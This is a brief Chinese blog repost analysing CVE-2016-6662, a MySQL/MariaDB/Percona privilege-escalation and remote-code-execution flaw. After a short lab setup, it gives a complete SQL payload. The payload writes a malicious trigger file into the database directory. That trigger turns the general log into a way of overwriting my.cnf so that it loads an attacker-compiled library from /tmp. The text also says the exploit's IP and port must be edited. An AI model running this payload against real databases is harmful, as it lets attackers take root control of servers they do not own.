MYSQL提权方法

时间  2019-11-29
标签 mysql 方法 栏目 MySQL 繁體版
原文   原文链接

            cve-2016-6662 MYSQL提权分析

MySQL  <= 5.7.15       远程代码执行/ 提权 (0day)
        5.6.33
        5.5.52

Mysql分支的版本也受影响,包括:
    MariaDB
    PerconaDB
建立bob用户,并赋予file,select,insert权限,建立用于实验的数据库activedb和表active_table

 

将exp先写入tmp目录,并编译成so文件,须要修改一下ip,port和my.cnf的位置python

select "TYPE=TRIGGERS\ntriggers='CREATE DEFINER=`root`@`localhost` TRIGGER active_table\nAFTER INSERT\n   ON `active_table` FOR EACH ROW\nBEGIN\n   DECLARE void varchar(550);\n   set global general_log_file=\\\'/etc/mysql/my.cnf\\\';\n   set global general_log = on;\n   select \"\n[mysqld]\nmalloc_lib=\\\'/tmp/mysql_hookandroot_lib.so\\\'\n\" INTO void;   \n   set global general_log = off;\nEND'\nsql_modes=1073741824\ndefiners='root@localhost'\nclient_cs_names='latin1'\nconnection_cl_names='latin1_swedish_ci'\ndb_cl_names='latin1_swedish_ci'" into dumpfile '/var/lib/mysql/activedb/active_table.TRG';

 

发现可写的my.cnf会被忽略???不知道为何(难道打补丁了?),不知道5.5的状况会怎么样,因此先把my.cnf的权限改回来744mysql

 文章转发至:http://blog.0kami.cn/2016/09/18/cve-2016-6663-mysql-exp/sql

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程